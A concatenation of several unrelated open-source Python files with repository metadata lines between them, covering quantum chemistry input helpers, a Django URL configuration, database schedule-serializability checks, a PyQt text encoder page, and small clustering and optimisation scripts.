"optimizer": user_dict["PCM"]["SCRF"]["optimizer"],
"dynamic_thrs": user_dict["PCM"]["SCRF"]["dynamic_thrs"],
"density_type": user_dict["PCM"]["SCRF"]["density_type"],
"epsilon_in": user_dict["PCM"]["Permittivity"]["epsilon_in"],
"epsilon_out": user_dict["PCM"]["Permittivity"]["epsilon_out"],
"formulation": user_dict["PCM"]["Permittivity"]["formulation"],
}
# Coulomb
if wf_dict["method_type"] in ["hartree", "hf", "dft"]:
fock_dict["coulomb_operator"] = {
"poisson_prec": user_dict["Precisions"]["poisson_prec"],
"shared_memory": user_dict["MPI"]["share_coulomb_potential"],
}
# Exchange
if wf_dict["method_type"] in ["hf", "dft"]:
fock_dict["exchange_operator"] = {
"poisson_prec": user_dict["Precisions"]["poisson_prec"],
"exchange_prec": user_dict["Precisions"]["exchange_prec"],
}
# Exchange-Correlation
if wf_dict["method_type"] in ["dft"]:
func_dict = []
for line in wf_dict["dft_funcs"].split("\n"):
sp = line.split()
if len(sp) > 0:
func = sp[0].lower()
coef = [1.0]
if len(sp) > 1:
coef = list(map(float, sp[1:]))
func_dict.append({"name": func, "coef": coef[0]})
fock_dict["xc_operator"] = {
"shared_memory": user_dict["MPI"]["share_xc_potential"],
"xc_functional": {
"spin": user_dict["DFT"]["spin"],
"cutoff": user_dict["DFT"]["density_cutoff"],
"functionals": func_dict,
},
}
# External electric field
if len(user_dict["ExternalFields"]["electric_field"]) > 0:
fock_dict["external_operator"] = {
"electric_field": user_dict["ExternalFields"]["electric_field"],
"r_O": origin,
}
return fock_dict
def write_scf_guess(user_dict, wf_dict):
guess_str = user_dict["SCF"]["guess_type"].lower()
guess_type = guess_str.split("_")[0]
zeta = 0
scf_dict = user_dict["SCF"]
guess_prec = scf_dict["guess_prec"]
if guess_type == "chk":
# At least one orbital must be present in the checkpoint folder
chk_Phi = Path(f"{scf_dict['path_checkpoint']}/phi_scf_idx_0.meta")
if not chk_Phi.is_file():
print(
f"No checkpoint guess found in {scf_dict['path_checkpoint']}, falling back to 'sad_gto' initial guess"
)
guess_type = "sad_gto"
else:
# adjust guess precision if checkpoint files are present
guess_prec = user_dict["world_prec"]
if guess_type in ["core", "sad"]:
zeta_str = guess_str.split("_")[1]
if zeta_str == "sz":
zeta = 1
elif zeta_str == "dz":
zeta = 2
elif zeta_str == "tz":
zeta = 3
elif zeta_str == "qz":
zeta = 4
elif zeta_str == "gto":
guess_type = guess_str
else:
print("Invalid zeta:" + zeta_str)
file_dict = user_dict["Files"]
if guess_type == "cube":
found = parse_files(user_dict)
if not found:
print(
f"No CUBE guess found in any of the 'initial_guess' sub-folders, falling back to 'sad_gto' initial guess"
)
guess_type = "sad_gto"
vector_dir = file_dict["cube_vectors"]
guess_dict = {
"zeta": zeta,
"prec": guess_prec,
"type": guess_type,
"method": wf_dict["method_name"],
"relativity": wf_dict["relativity_name"],
"environment": wf_dict["environment_name"],
"external_field": wf_dict["external_name"],
"screen": scf_dict["guess_screen"],
"localize": scf_dict["localize"],
"restricted": user_dict["WaveFunction"]["restricted"],
"file_chk": f"{scf_dict['path_checkpoint']}/phi_scf",
"file_basis": file_dict["guess_basis"],
"file_gto_p": file_dict["guess_gto_p"],
"file_gto_a": file_dict["guess_gto_a"],
"file_gto_b": file_dict["guess_gto_b"],
"file_phi_p": file_dict["guess_phi_p"] + "_scf",
"file_phi_a": file_dict["guess_phi_a"] + "_scf",
"file_phi_b": file_dict["guess_phi_b"] + "_scf",
"file_CUBE_p": f"{vector_dir}CUBE_p_vector.json",
"file_CUBE_a": f"{vector_dir}CUBE_a_vector.json",
"file_CUBE_b": f"{vector_dir}CUBE_b_vector.json",
}
return guess_dict
def write_scf_solver(user_dict, wf_dict):
# SCF precisions and thresholds
start_prec = user_dict["SCF"]["start_prec"]
final_prec = user_dict["SCF"]["final_prec"]
if final_prec < 0.0:
final_prec = user_dict["world_prec"]
if start_prec < 0.0:
start_prec = final_prec
scf_dict = user_dict["SCF"]
solver_dict = {
"method": wf_dict["method_name"],
"relativity": wf_dict["relativity_name"],
"environment": wf_dict["environment_name"],
"external_field": wf_dict["external_name"],
"kain": scf_dict["kain"],
"max_iter": scf_dict["max_iter"],
"rotation": scf_dict["rotation"],
"localize": scf_dict["localize"],
"file_chk": scf_dict["path_checkpoint"] + "/phi_scf",
"checkpoint": scf_dict["write_checkpoint"],
"start_prec": start_prec,
"final_prec": final_prec,
"energy_thrs": scf_dict["energy_thrs"],
"orbital_thrs": scf_dict["orbital_thrs"],
"helmholtz_prec": user_dict["Precisions"]["helmholtz_prec"],
}
return solver_dict
def write_scf_properties(user_dict, origin):
prop_dict = {}
if user_dict["Properties"]["dipole_moment"]:
prop_dict["dipole_moment"] = {}
prop_dict["dipole_moment"]["dip-1"] = {
"operator": "h_e_dip",
"precision": user_dict["world_prec"],
"r_O": origin,
}
if user_dict["Properties"]["quadrupole_moment"]:
prop_dict["quadrupole_moment"] = {}
prop_dict["quadrupole_moment"]["quad-1"] = {
"operator": "h_e_quad",
"precision": user_dict["world_prec"],
"r_O": origin,
}
if user_dict["Properties"]["geometric_derivative"]:
prop_dict["geometric_derivative"] = {}
prop_dict["geometric_derivative"]["geom-1"] = {
"operator": "h_nuc_grad",
"precision": user_dict["world_prec"],
"smoothing": user_dict["Precisions"]["nuclear_prec"],
}
return prop_dict
def write_scf_plot(user_dict):
plot_dict = {}
if user_dict["Properties"]["plot_density"] or len(
user_dict["Properties"]["plot_orbitals"]
):
plot_dict["orbitals"] = user_dict["Properties"]["plot_orbitals"]
plot_dict["density"] = user_dict["Properties"]["plot_density"]
plot_dict["plotter"] = user_dict["Plotter"]
if user_dict["world_unit"] == "angstrom":
plot_dict["plotter"] = {
k: [
user_dict["Constants"]["angstrom2bohrs"] * r
for r in plot_dict["plotter"][k]
]
for k in plot_dict["plotter"].keys()
}
return plot_dict
def write_rsp_calc(omega, user_dict, origin):
wf_dict = parse_wf_method(user_dict)
if not wf_dict["relativity_name"] in ["None", "Off"]:
raise RuntimeError(
"Linear response not available: " + wf_dict["relativity_name"]
)
rsp_dict = user_dict["Response"]
file_dict = user_dict["Files"]
rsp_calc = {}
rsp_calc["frequency"] = omega
rsp_calc["dynamic"] = omega > 1.0e-12
rsp_calc["fock_operator"] = write_rsp_fock(user_dict, wf_dict)
rsp_calc["unperturbed"] = {
"precision": user_dict["world_prec"],
"localize": rsp_dict["localize"],
"fock_operator": write_scf_fock(user_dict, wf_dict, origin),
}
guess_str = rsp_dict["guess_type"].lower()
user_guess_type = guess_str.split("_")[0]
user_guess_prec = rsp_dict["guess_prec"]
vector_dir = file_dict["cube_vectors"]
rsp_calc["components"] = []
for dir in [0, 1, 2]:
rsp_comp = {}
program_guess_type = user_guess_type
program_guess_prec = user_guess_prec
# check that initial guess files exist
if user_guess_type == "chk":
chk_X = Path(f"{rsp_dict['path_checkpoint']}/X_rsp_{dir:d}")
chk_Y = Path(f"{rsp_dict['path_checkpoint']}/Y_rsp_{dir:d}")
if not (chk_X.is_file() and chk_Y.is_file()):
print(
f"No checkpoint guess found in {rsp_dict['path_checkpoint']} for direction {dir:d}, falling back to zero initial guess"
)
program_guess_type = "none"
else:
# adjust guess precision if checkpoint files are present
program_guess_prec = user_dict["world_prec"]
elif user_guess_type == "cube":
found = parse_files(user_dict, dir)
if not found:
print(
f"No CUBE guess found in any of the 'initial_guess' sub-folders for direction {dir:d}, falling back to zero initial guess"
)
program_guess_type = "none"
else:
# do no checks on other types of guess
pass
rsp_comp["initial_guess"] = {
"prec": program_guess_prec,
"type": program_guess_type,
"file_chk_x": f"{rsp_dict['path_checkpoint']}/X_rsp_{dir:d}",
"file_chk_y": f"{rsp_dict['path_checkpoint']}/Y_rsp_{dir:d}",
"file_x_p": f"{file_dict['guess_x_p']}_rsp_{dir:d}",
"file_x_a": f"{file_dict['guess_x_a']}_rsp_{dir:d}",
"file_x_b": f"{file_dict['guess_x_b']}_rsp_{dir:d}",
"file_y_p": f"{file_dict['guess_y_p']}_rsp_{dir:d}",
"file_y_a": f"{file_dict['guess_y_a']}_rsp_{dir:d}",
"file_y_b": f"{file_dict['guess_y_b']}_rsp_{dir:d}",
"file_CUBE_x_p": f"{vector_dir}CUBE_x_p_{dir:d}_vector.json",
"file_CUBE_x_a": f"{vector_dir}CUBE_x_a_{dir:d}_vector.json",
"file_CUBE_x_b": f"{vector_dir}CUBE_x_b_{dir:d}_vector.json",
"file_CUBE_y_p": f"{vector_dir}CUBE_y_p_{dir:d}_vector.json",
"file_CUBE_y_a": f"{vector_dir}CUBE_y_a_{dir:d}_vector.json",
"file_CUBE_y_b": f"{vector_dir}CUBE_y_b_{dir:d}_vector.json",
}
if rsp_dict["write_orbitals"]:
path_orbitals = rsp_dict["path_orbitals"]
rsp_comp["write_orbitals"] = {
"file_x_p": f"{path_orbitals}/X_p_rsp_{dir:d}",
"file_x_a": f"{path_orbitals}/X_a_rsp_{dir:d}",
"file_x_b": f"{path_orbitals}/X_b_rsp_{dir:d}",
"file_y_p": f"{path_orbitals}/Y_p_rsp_{dir:d}",
"file_y_a": f"{path_orbitals}/Y_a_rsp_{dir:d}",
"file_y_b": f"{path_orbitals}/Y_b_rsp_{dir:d}",
}
if rsp_dict["run"][dir]:
rsp_comp["rsp_solver"] = write_rsp_solver(user_dict, wf_dict, dir)
rsp_calc["components"].append(rsp_comp)
return rsp_calc
def write_rsp_fock(user_dict, wf_dict):
fock_dict = {}
# Coulomb
if wf_dict["method_type"] in ["hartree", "hf", "dft"]:
fock_dict["coulomb_operator"] = {
"poisson_prec": user_dict["Precisions"]["poisson_prec"],
"shared_memory": user_dict["MPI"]["share_coulomb_potential"],
}
# Exchange
if wf_dict["method_type"] in ["hf", "dft"]:
fock_dict["exchange_operator"] = {
"poisson_prec": user_dict["Precisions"]["poisson_prec"],
"exchange_prec": user_dict["Precisions"]["exchange_prec"],
}
# Exchange-Correlation
if wf_dict["method_type"] in ["dft"]:
func_dict = []
for line in wf_dict["dft_funcs"].split("\n"):
sp = line.split()
if len(sp) > 0:
func = sp[0].lower()
coef = [1.0]
if len(sp) > 1:
coef = list(map(float, sp[1:]))
func_dict.append({"name": func, "coef": coef[0]})
fock_dict["xc_operator"] = {
"shared_memory": user_dict["MPI"]["share_xc_potential"],
"xc_functional": {
"spin": user_dict["DFT"]["spin"],
"cutoff": user_dict["DFT"]["density_cutoff"],
"functionals": func_dict,
},
}
return fock_dict
def write_rsp_solver(user_dict, wf_dict, d):
# Response precisions and thresholds
start_prec = user_dict["Response"]["start_prec"]
final_prec = user_dict["Response"]["final_prec"]
if final_prec < 0.0:
final_prec = user_dict["world_prec"]
if start_prec < 0.0:
start_prec = final_prec
rsp_dict = user_dict["Response"]
solver_dict = {
"method": wf_dict["method_name"],
"kain": rsp_dict["kain"],
"max_iter": rsp_dict["max_iter"],
"file_chk_x": rsp_dict["path_checkpoint"] + "/X_rsp_" + str(d),
"file_chk_y": rsp_dict["path_checkpoint"] + "/Y_rsp_" + str(d),
"checkpoint": rsp_dict["write_checkpoint"],
"start_prec": start_prec,
"final_prec": final_prec,
"orbital_thrs": user_dict["Response"]["orbital_thrs"],
"property_thrs": user_dict["Response"]["property_thrs"],
"helmholtz_prec": user_dict["Precisions"]["helmholtz_prec"],
"orth_prec": 1.0e-14,
}
return solver_dict
def parse_wf_method(user_dict):
method_name = ""
restricted = user_dict["WaveFunction"]["restricted"]
method_type = user_dict["WaveFunction"]["method"].lower()
dft_funcs = user_dict["DFT"]["functionals"].lower()
if method_type in ["core"]:
method_name = "Core Hamiltonian"
elif method_type in ["hartree"]:
method_name = "Hartree"
elif method_type in ["hf", "hartree-fock", "hartreefock"]:
method_name = "Hartree-Fock"
method_type = "hf"
elif method_type in ["dft"]:
method_name = "DFT"
elif method_type in ["lda"]:
method_name = "DFT (SVWN5)"
dft_funcs = "svwn5"
method_type = "dft"
elif method_type in SHORTHAND_FUNCTIONALS:
method_name = "DFT (" + method_type.upper() + ")"
dft_funcs = method_type
method_type = "dft"
else:
raise RuntimeError(
f"Invalid wavefunction method {user_dict['WaveFunction']['method']}"
)
# Determine relativity name label for print outs to the output file
relativity_name = "None"
if user_dict["WaveFunction"]["relativity"].lower() in ["none"]:
user_dict["WaveFunction"]["relativity"] = "off"
user_dict["ZORA"]["include_nuclear"] = False
user_dict["ZORA"]["include_coulomb"] = False
user_dict["ZORA"]["include_xc"] = False
if user_dict["WaveFunction"]["relativity"].lower() in ["nzora"]:
user_dict["WaveFunction"]["relativity"] = "zora"
user_dict["ZORA"]["include_nuclear"] = True
user_dict["ZORA"]["include_coulomb"] = False
user_dict["ZORA"]["include_xc"] = False
if user_dict["WaveFunction"]["relativity"].lower() in ["zora"]:
components = [
user_dict["ZORA"]["include_nuclear"],
user_dict["ZORA"]["include_coulomb"],
user_dict["ZORA"]["include_xc"],
]
names = ["V_nuc", "J", "V_xc"]
if any(components):
zora_terms = " + ".join(
[name for name, comp in zip(names, components) if comp]
)
relativity_name = "ZORA (" + zora_terms + ")"
else:
raise RuntimeError("ZORA selected, but no ZORA potential included")
if user_dict["ZORA"]["include_xc"] and not restricted:
raise RuntimeError(
"ZORA (V_xc) not available for unrestricted wavefunctions"
)
# Determine environment name label for print outs to the output file
environment_name = "None"
if user_dict["WaveFunction"]["environment"].lower() == "pcm":
environment_name = "PCM"
# Determine external name label for print outs to the output file
ext_dict = user_dict["ExternalFields"]
has_external_fields = len(ext_dict["electric_field"]) > 0
external_name = "None"
if has_external_fields:
# If no external fields, then the list will be empty
# Need to catch the exception and store placeholders
try:
x, y, z = ext_dict["electric_field"]
except ValueError:
x, y, z = None, None, None # Useless placeholders
# Labels to aggregate
external_name = f"Electric field ({x}, {y}, {z})"
wf_dict = {
"relativity_name": relativity_name,
"environment_name": environment_name,
"external_name": external_name,
"method_name": method_name,
"method_type": method_type,
"dft_funcs": dft_funcs,
}
return wf_dict
| MRChemSoft/mrchem | python/mrchem/helpers.py | helpers.py | py | 18,587 | python | en | code | 22 | github-code | 36 |
72911967144 | """The URL configuration of the application
When the particular URL is hit it feeds the request to the corresponding view.
"""
from django.urls import path
from django.views.generic import RedirectView
from .views import base, add_to_registry, validate_url, issue_registry, dashboard
urlpatterns = [
path('base/', base),
path('add/', add_to_registry),
path('api/validate_url', validate_url),
path('issue_registry/', issue_registry),
path('dashboard/', dashboard, name='dashboard'),
path('', RedirectView.as_view(pattern_name='dashboard', permanent=False)),
]
| architsingh15/django-radius-github | issue_tracker/urls.py | urls.py | py | 585 | python | en | code | 1 | github-code | 36 |
38514393390 | """
This module contains functions to check whether a schedule is:
1. view-serializable
2. conflict-serializable
3. recoverable
4. avoids cascading aborts
5. strict
It also contains some nice functions to tabularize schedules into tex and draw
a conflict graph using matplotlib.
"""
from action import *
from collections import defaultdict
import itertools
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
################################################################################
# helper functions
################################################################################
def flatten(ls):
"""
>>> flatten([[], [1], [2,3], [4]])
[1, 2, 3, 4]
"""
return [x for l in ls for x in l]
def graphs_eq(g1, g2):
"""
Returns if two networkx graphs are 100% identical.
>>> G1 = nx.DiGraph()
>>> G1.add_nodes_from([1, 2, 3])
>>> G1.add_edges_from([(1, 2), (2, 3), (3, 1)])
>>> G2 = nx.DiGraph()
>>> G2.add_nodes_from([3, 2, 1])
>>> G2.add_edges_from([(3, 1), (2, 3), (1, 2)])
>>> G3 = nx.DiGraph()
>>> G3.add_nodes_from([1, 2, 3, 4])
>>> G3.add_edges_from([(1, 2), (2, 3), (3, 1)])
>>> G4 = nx.DiGraph()
>>> G4.add_nodes_from([1, 2, 3])
>>> G4.add_edges_from([(1, 2), (2, 3), (3, 1), (1, 4)])
>>> graphs_eq(G1, G2)
True
>>> graphs_eq(G2, G1)
True
>>> graphs_eq(G1, G3)
False
>>> graphs_eq(G1, G4)
False
"""
return (set(g1.nodes()) == set(g2.nodes()) and
set(g1.edges()) == set(g2.edges()))
def transaction_ids(schedule):
"""
Return a list of the _unique_ transaction ids in the schedule in the order
that they appear.
>>> transaction_ids([r(1, "A"), r(2, "A"), w(1, "A"), r(3, "A")])
[1, 2, 3]
"""
js = []
for a in schedule:
if a.i not in js:
js.append(a.i)
return js
def transactions(schedule):
"""
Partitions a schedule into the list of transactions that compose it.
Transactions are returned in the order in which an operation of the
transaction first appears.
>>> transactions([
... r(1, "A"),
... w(2, "A"),
... commit(2),
... w(1, "A"),
... commit(1),
... w(3, "A"),
... commit(3),
... ])
[[R_1(A), W_1(A), Commit_1], [W_2(A), Commit_2], [W_3(A), Commit_3]]
>>> transactions([
... w(2, "A"),
... r(1, "A"),
... commit(2),
... w(1, "A"),
... commit(1),
... w(3, "A"),
... commit(3),
... ])
[[W_2(A), Commit_2], [R_1(A), W_1(A), Commit_1], [W_3(A), Commit_3]]
"""
js = transaction_ids(schedule)
partitions = [[] for _ in range(len(js))]
index = {js: i for (i, js) in enumerate(js)}
for a in schedule:
partitions[index[a.i]].append(a)
return partitions
def drop_aborts(schedule):
"""
Remove all transactions that abort.
>>> drop_aborts([r(1, "A"), r(2, "A"), r(3, "A"), abort(1), commit(2), abort(3)])
[R_2(A), Commit_2]
"""
aborteds = {a.i for a in schedule if a.op == ABORT}
return [a for a in schedule if a.i not in aborteds]
def add_commits(schedule):
"""
Add a commit for every transaction that doesn't end in a commit or abort.
Commits are added in the order of the first action of the transaction.
>>> add_commits([r(1, "A"), r(2, "A"), r(3, "A"), r(4, "A"), commit(2), abort(4)])
[R_1(A), R_2(A), R_3(A), R_4(A), Commit_2, Abort_4, Commit_1, Commit_3]
"""
ends = {a.i for a in schedule if a.op == COMMIT or a.op == ABORT}
no_ends = [i for i in transaction_ids(schedule) if i not in ends]
return schedule + [commit(i) for i in no_ends]
def first_read(schedule):
"""
Returns a mapping from each object to the transaction ids that initially
read it. If an object is never read, it is not included in the return.
>>> first_read([w(1, "A"), w(2, "B")])
{}
>>> first_read([r(1, "A"), r(2, "B"), r(2, "A")])
{'A': [1, 2], 'B': [2]}
"""
fr = defaultdict(list)
written = set()
for a in schedule:
if a.op == READ and a.obj not in written:
fr[a.obj].append(a.i)
elif a.op == WRITE:
written.add(a.obj)
return dict(fr)
def number(schedule):
"""
Enumerates each action according to its appearance within its transaction.
The enumeration begins at 0.
>>> number([r(1, "A"), r(1, "B"), r(2, "A"), w(3, "A"), commit(2)])
[(0, R_1(A)), (1, R_1(B)), (0, R_2(A)), (0, W_3(A)), (1, Commit_2)]
"""
ns = {i: 0 for i in transaction_ids(schedule)}
s = []
for a in schedule:
s.append((ns[a.i], a))
ns[a.i] += 1
return s
def view_graph(schedule):
"""
First, the schedule is numbered using the number function. Then, an edge is
added from each read of an object to the most recent write to the same
object.
>>> view_graph([w(1, "A"), r(2, "A"), r(1, "A")]) #doctest: +SKIP
+------------+ +------------+
| (0, W_1(A) |<----| (0, R_2(A) |
+------------+ +------------+
^
|
+------------+
| (1, R_1(A) |
+------------+
"""
G = nx.DiGraph()
last_written = {}
for (i, a) in number(schedule):
if a.op == WRITE:
last_written[a.obj] = (i, a)
elif a.op == READ:
if a.obj in last_written:
G.add_edge((i, a), last_written[a.obj])
else: # a.op == COMMIT or a.op == ABORT
pass
return G
def last_written(schedule):
"""
Returns a mapping from each object to the transaction id that last writes
it. If an object is never written, it is not included in the return.
>>> last_written([r(1, "A"), r(2, "B")])
{}
>>> last_written([w(1, "A"), w(2, "B"), w(2, "A")])
{'A': 2, 'B': 2}
"""
lw = {}
for a in schedule:
if a.op == WRITE:
lw[a.obj] = a.i
return lw
def view_equivalent(s1, s2):
"""
Two schedules s1 and s2 are view equivalent if
1. If Ti reads the initial value of object A in s1, it must also read
the initial value of A in s2.
2. If Ti reads a value of A written by Tj in s1, it must also read the
value of A written by Tj in s2.
3. For each data object A, the transaction (if any) that performs the
final write on A in s1 must also perform the final write on A in s2.
"""
assert set(transaction_ids(s1)) == set(transaction_ids(s2))
# condition 1
if not (first_read(s1) == first_read(s2)):
return False
# condition 2
if not graphs_eq(view_graph(s1), view_graph(s2)):
return False
# condition 3
if not (last_written(s1) == last_written(s2)):
return False
return True
################################################################################
# predicates
################################################################################
def view_serializable(schedule):
"""
A schedule is view serializable if it is view equivalent to a some serial
schedule over the same transactions. Aborted transactions are ignored.
"""
schedule = drop_aborts(schedule)
# conflict serializability implies view serializability
if conflict_serializable(schedule):
return True
# if a schedule is not conflict serializable but doesn't have blind writes,
# then it isn't view serializabile
partitions = transactions(schedule)
blind_write = False
for t in partitions:
objects_read = set()
for a in t:
if a.op == WRITE and a.obj not in objects_read:
blind_write = True
elif a.op == READ:
objects_read.add(a.obj)
else: # a.op == COMMIT or a.op == ABORT
pass
if not blind_write:
return False
# brute force check over all serializations to see if the schedule is view
# equivalent to any serial schedule over the same set of transactions
for s in itertools.permutations(transactions(schedule)):
s = flatten(list(s))
if view_equivalent(s, schedule):
return True
return False
def conflict_serializable(schedule):
"""
A schedule is conflict serializable if its conflict graph is acyclic.
Aborted transactions are ignored.
"""
return len(list(nx.simple_cycles(conflict_graph(schedule)))) == 0
def recoverable(schedule):
"""
A schedule is recoverable if all the transactions whose changes it read
commit and the schedule commits after them.
"""
schedule = add_commits(schedule)
written_by = defaultdict(list) # object -> ids
read_from = defaultdict(set) # id -> ids
committed = set() # ids
for a in schedule:
if a.op == WRITE:
written_by[a.obj].append(a.i)
elif a.op == READ:
if a.obj in written_by and \
len(written_by[a.obj]) > 0 and \
written_by[a.obj][-1] != a.i:
read_from[a.i].add(written_by[a.obj][-1])
elif a.op == COMMIT:
if not all(i in committed for i in read_from[a.i]):
return False
committed.add(a.i)
elif a.op == ABORT:
for (o, ids) in written_by.iteritems():
written_by[o] = [i for i in ids if i != a.i]
return True
def aca(schedule):
"""A schedule avoids cascading aborts if it only reads commited changes."""
schedule = add_commits(schedule)
last_write = defaultdict(list) # object -> ids
committed = set() # ids
for a in schedule:
if a.op == WRITE:
last_write[a.obj].append(a.i)
elif a.op == READ:
if a.obj in last_write and \
len(last_write[a.obj]) > 0 and \
last_write[a.obj][-1] not in committed \
and last_write[a.obj][-1] != a.i:
return False
elif a.op == COMMIT:
committed.add(a.i)
elif a.op == ABORT:
for (o, ids) in last_write.iteritems():
last_write[o] = [i for i in ids if i != a.i]
return True
def strict(schedule):
"""
A schedule is strict if never reads or writes to an uncommited changed
variable.
"""
schedule = add_commits(schedule)
last_write = defaultdict(list) # object -> id
committed = set() # ids
for a in schedule:
if a.op == WRITE or a.op == READ:
if a.obj in last_write and \
len(last_write[a.obj]) > 0 and \
last_write[a.obj][-1] not in committed and \
last_write[a.obj][-1] != a.i:
return False
if a.op == WRITE:
last_write[a.obj].append(a.i)
elif a.op == COMMIT:
committed.add(a.i)
elif a.op == ABORT:
for (o, ids) in last_write.iteritems():
last_write[o] = [i for i in ids if i != a.i]
return True
################################################################################
# misc
################################################################################
def tex(schedule):
"""
Return a texed tabular representation of a schedule.
>>> tex([r(1,"A"), r(1,"B"), r(2,"B"), r(3,"B"), r(1,"A"), r(2,"B")]) #doctest: +SKIP
+--------+--------+--------+
| T_1 | T_2 | T_3 |
+--------+--------+--------+
| R_1(A) | | |
| R_1(B) | | |
| | R_2(B) | |
| | | R_3(B) |
| R_1(A) | | |
| | R_2(B) | |
+--------+--------+--------+
"""
transactions = sorted(transaction_ids(schedule))
s = r"\begin{tabular}{" + ("|" + "|".join("c" for _ in transactions) + "|" )+ "}\n"
s += r"\hline" + "\n"
s += "&".join("$T_{}$".format(t) for t in transactions) + r"\\\hline" + "\n"
for a in schedule:
index = transactions.index(a.i)
s += ("&" * index) + a.tex() + ("&" * (len(transactions) - 1 - index))
s += r"\\\hline" + "\n"
s += r"\end{tabular}" + "\n"
return s
def conflict_graph(schedule):
"""
A graph with an edge from a to b for each pair of actions (a, b) from
different transactions on the same object where at least one of the actions
is a write and a precedes b.
"""
schedule = drop_aborts(schedule)
G = nx.DiGraph()
G.add_nodes_from(transaction_ids(schedule))
for (i, a) in enumerate(schedule):
for b in schedule[i+1:]:
same_obj = a.obj == b.obj
diff_txn = a.i != b.i
conflict = a.op == WRITE or b.op == WRITE
if same_obj and diff_txn and conflict:
G.add_edge(a.i, b.i)
return G
def draw(G):
"""Prettily draw a networkx graph G."""
plt.figure()
color_range = np.linspace(0, 1, len(G.nodes()))
labels = {n: "$T_{{{}}}$".format(n) for n in G}
pos = nx.spectral_layout(G)
kwargs = {
"alpha": 1.0,
"cmap": plt.get_cmap("Dark2"), # http://bit.ly/1ItQDgE
"font_color": "w",
"font_size": 40,
"labels": labels,
"node_color": color_range,
"node_size": 10000,
"pos": pos, # http://bit.ly/1DAnT4y
"width": 4.0,
"with_labels": True,
}
nx.draw(G, **kwargs)
if __name__ == "__main__":
import doctest
doctest.testmod()
| mwhittaker/serial | serial.py | serial.py | py | 13,575 | python | en | code | 2 | github-code | 36 |
5199805944 | from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from widgets.mixins import TextColorMixin
from utils.encoders import EncodeMethod, create_encoder
from strings import _
class EncodePage(QWidget, TextColorMixin):
def __init__(self, parent=None):
super(EncodePage, self).__init__(parent)
self.setupUi()
def setupUi(self):
self.method_base64 = self.create_method_radio('BASE64', EncodeMethod.base64)
self.method_md5 = self.create_method_radio('MD5', EncodeMethod.md5)
self.method_url = self.create_method_radio('URL', EncodeMethod.url)
self.method_html = self.create_method_radio('HTML', EncodeMethod.html)
btnEncode = QPushButton('&Encode')
btnDecode = QPushButton('&Decode')
self.src_edit = QTextEdit()
self.src_edit.setFixedHeight(300)
self.dest_edit = QTextEdit()
self.dest_edit.setFixedHeight(300)
method_box = QHBoxLayout()
method_box.addWidget(QLabel(_('method')))
method_box.addWidget(self.method_base64)
method_box.addWidget(self.method_md5)
method_box.addWidget(self.method_url)
method_box.addWidget(self.method_html)
method_box.addStretch()
btnBox = QVBoxLayout()
btnBox.addStretch()
btnBox.addWidget(btnEncode)
btnBox.addWidget(btnDecode)
btnBox.addStretch()
center_box = QHBoxLayout()
center_box.addWidget(self.src_edit, 1)
center_box.addLayout(btnBox)
center_box.addWidget(self.dest_edit, 1)
vbox = QVBoxLayout()
vbox.addLayout(method_box)
vbox.addLayout(center_box)
vbox.addStretch()
self.setLayout(vbox)
btnEncode.clicked.connect(self.on_encode)
btnDecode.clicked.connect(self.on_decode)
self.src_edit.textChanged.connect(self.on_srcEdit_textChanged)
self.dest_edit.textChanged.connect(self.on_destEdit_textChanged)
def create_method_radio(self, text, value):
radio = QRadioButton(text)
radio.setProperty('value', value)
return radio
def on_initialized(self):
self.method_base64.setChecked(True)
def get_encoder(self):
method = EncodeMethod.base64
if self.method_md5.isChecked():
method = EncodeMethod.md5
elif self.method_url.isChecked():
method = EncodeMethod.url
elif self.method_html.isChecked():
method = EncodeMethod.html
return create_encoder(method)
@pyqtSlot()
def on_encode(self):
try:
src = self.src_edit.toPlainText().strip()
encoder = self.get_encoder()
result = encoder.encode(src)
self.setColoredText(self.dest_edit, result, True)
except Exception as e:
self.setColoredText(self.dest_edit, str(e), False)
@pyqtSlot()
def on_decode(self):
try:
src = self.dest_edit.toPlainText().strip()
encoder = self.get_encoder()
result = encoder.decode(src)
self.setColoredText(self.src_edit, result, True)
except Exception as e:
self.setColoredText(self.src_edit, str(e), False)
@pyqtSlot()
def on_srcEdit_textChanged(self):
if self.src_edit.hasFocus():
self.on_encode()
@pyqtSlot()
def on_destEdit_textChanged(self):
if self.dest_edit.hasFocus():
self.on_decode()
| shuhari/DevToolbox | src/pages/py/encode_page.py | encode_page.py | py | 3,455 | python | en | code | 0 | github-code | 36 |
789669298 | import argparse
from experiment import Experiment
import Limited_GP
parser = argparse.ArgumentParser()
parser.add_argument('--number-of-batches', type=int, default=1)
parser.add_argument('--current-batch', type=int, default=1)
parser.add_argument('--budget', type=int, default=10000)
parser.add_argument('--suite-name', default='bbob')
args = parser.parse_args()
e = Experiment(suite_name=args.suite_name, solver=Limited_GP.solve, algorithm_name='Limited-GP')
e.run(budget=args.budget, current_batch=args.current_batch, number_of_batches=args.number_of_batches)
| pfnet-research/limited-gp | solver/run.py | run.py | py | 564 | python | en | code | 5 | github-code | 36 |
3238091001 | import math
import numpy as np
import pandas as pd
def distance(point1,point2):
return math.sqrt(pow(point1[0] - point2[0], 2) + pow(point1[1] - point2[1], 2))
points = []
center_points = []
K = 0
file="D:\\experiment\\第三次豆瓣\\测试3\\train\\douban_train_zuobiao.csv"
data=pd.read_csv(file)
train_data = np.array(data)#np.ndarray()每个姓名转换为一个list[]
#print(type(train_data))
all_list=train_data.tolist()#转换list
#print(all_list)
for item in all_list:
print(item[1])
print(item[2])
print("-----------------------")
point = [item[1], item[2]]
points.append(point)
#print(type(points))#每个点存入列表
points = np.array(points)#转化为数组形式
#print(points)
T = 0
for item in points:
avg = 0
for other in points:
if all(other == item):
continue
avg += distance(item,other)
avg /= 181
print("当前点的平均距离为:",avg)
T += avg
T /= 182
print("T值为:",T) | JiaoZixun/Recommend_By_Canopy-K-means | recommend——豆瓣/step3———确定T值.py | step3———确定T值.py | py | 984 | python | en | code | 18 | github-code | 36 |
21535691646 |
def semantic_validity_factory(value, semantic_name, null_values=set(['Unspecified', 'N/A', '', 0, None]), **kwargs) :
if value in null_values:
return (None, None)
elif all(f(value) for name, f in kwargs.items() if 'semantic' in name):
if all(f(value) for name, f in kwargs.items() if 'valid' in name):
return (semantic_name, 'valid')
else:
return (semantic_name, 'invalid')
else:
# only checking for semantic type!
return (None, None)
| charlesdguthrie/bigDataProject | scripts/semantic_validity_factory.py | semantic_validity_factory.py | py | 516 | python | en | code | 1 | github-code | 36 |
14432332319 | #from ast import If
#from pprint import pp
#from typing import final
from genericpath import exists
from multiprocessing.reduction import duplicate
import re
import string
from unittest import result
from tokens import tokens
